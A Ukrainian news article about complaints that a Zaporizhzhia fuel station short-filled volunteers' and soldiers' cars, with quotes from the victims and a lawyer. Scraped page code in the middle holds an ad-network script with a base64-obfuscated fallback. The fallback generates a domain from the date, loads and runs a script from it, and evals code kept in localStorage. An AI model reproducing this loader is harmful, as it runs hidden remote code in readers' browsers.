У Запоріжжі скаржаться на недолив пального на одній з автозаправок (ВІДЕО)

За словами запорізького волонтера Дениса Довгаля, 26 червня, на автозаправній станції “BARREL”, йому не залили пальне в авто. Про те, що бак порожній, волонтери помітили у дорозі та викликали патрульну поліцію на АЗС. Журналісти Суспільного дізнавались подробиці.

Під час чергової подорожі до військових на передову, Денис Довгаль заїхав на автозаправку, що знаходиться на зупинці “Автовокзал” у Запоріжжі по проспекту Соборному.


Денис Довгаль. Фото: Суспільне Запоріжжя

«Цього разу везли рації, посуд, ложки, тарілки, а також продукти. Заїхали сюди, дали 500 гривень. За лічильником “накрутило” на 500 гривень. Ми подякували і поїхали. Поїхали у бік Південного ринку, адже нам на Оріхів, а за стадіоном “Торпедо” у нас машина зупинилась», — каже він.


Фото: Суспільне Запоріжжя

«Спустилися ми сюди. Підходимо до “заправниці”, а вона нам у нахабній формі каже: це ваші проблеми. Попрохав телефон гарячої лінії — відмовила. До речі, тут ніде не висить у них ніяких оголошень. Телефон керівника не дала. Мій записала — сказала, що директор сам зателефонує. Ми викликали поліцію, ті швидко відреагували та приїхали. Заправку закрили та провели перевірку. У неї все зійшлося, але механічний лічильник не перевіряли, пломби не дивились», — каже він.

Про те, що на цій заправці не доливають пальне розповів й один з військовослужбовців територіальної оборони Запоріжжя.

«Приблизно місяць тому ми заправлялись на заправці біля Автовокзалу. Після того як заправились, виїхали, але стрілка навіть не піднялася. Повернулись, підійшли до оператора, а вона нам “тикнула” — ось дивіться ви ж заправились», — каже він.


Фото: Суспільне Запоріжжя

«Хочу справедливості. Я приїхав заправився, заплатив гроші, газу я не отримав. Як не отримали пальне мої знайомі волонтери. Зі мною ніхто досі не зв’язався. Хочу, щоб перевірили цю заправку, адже у мене під дописом у соціальній мережі сотні, можливо тисячі таких же скарг від людей на цю заправку», — каже Денис Довгаль. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Журналісти Суспільного намагались отримати коментар на заправній станції. Після того, як працівники побачили знімальну групу — двері приміщення приймання платежів зачинили.


Фото: Суспільне Запоріжжя

Тим часом юрист Дмитро Гладкий каже: розв’язувати питання щодо якості та обсягу пального споживачі спочатку мають з адміністрацією АЗС.

«Якщо питання не вирішується, або дійсно, вбачається порушення прав споживача, то потрібно звертатися до поліції, бо можуть бути ознаки шахрайства, якщо це навмисно, або адміністрація зробила таку “вказівку” і це буде встановлено, для того, щоб обманювати споживачів. Якщо це помилка, якщо це не навмисно, якщо відсутній склад кримінального правопорушення, то звертатись до органу захисту справ споживачів для того, аби встановили таке порушення і відповідно до цього буде як накладено штраф на порушника, так і можливість отримати певні компенсації від порушника вже шляхом звернення до цивільного суду», — каже адвокат.


Дмитро Гладкий. Фото: Суспільне Запоріжжя

Журналісти Суспільного передали інформаційний запит на автозаправній станції, що розташована на проспекті Соборному, 8. Також Суспільне намагалося передати інформаційний запит за юридичною адресою товариства з обмеженою відповідальністю “Простор-ДС”, котре вказано на фіскальному чеку Дениса Довгаля —охоронець приміщення сказав, що ніколи не бачив там представників ТОВ “Простор-ДС”.

У пресслужбі Головного управління Національної поліції у Запорізькій області пообіцяли надати офіційну відповідь на інформаційний запит Суспільного щодо ситуації із недоливом пального. Надалі Суспільне готове надати слово всім сторонам.

Подписывайтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/u-zaporizhzhi-skarzhatsya-na-nedoliv-palnogo-na-odnij-z-avtozapravok-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top